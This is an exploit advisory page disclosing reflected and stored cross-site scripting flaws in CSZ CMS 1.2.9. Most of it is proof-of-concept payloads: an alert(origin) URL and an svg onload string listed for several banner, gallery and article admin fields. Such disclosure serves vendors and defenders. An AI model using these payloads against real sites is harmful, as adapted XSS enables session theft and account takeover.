CSZ CMS 1.2.9 Cross Site Scripting

2021.01.05
Credit: SunCSR
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting # Date: 2020/12/28 # Exploit Author: SunCSR # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.2.9 # Tested on: CSZ CMS 1.2.9 1. Reflected XSS Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc <http://localhost/pluginabc%22-alert%28origin%29-%22abc> 2. Stored XSS Use an editor account with rights to manage banners, plugins. + Banner Manager: - Add or edit banner: Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> + Plugin Manager: - Add or edit album(/admin/plugin/gallery): Album Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Short Description field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> - Add or edit Category(/admin/plugin/article/): Category Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top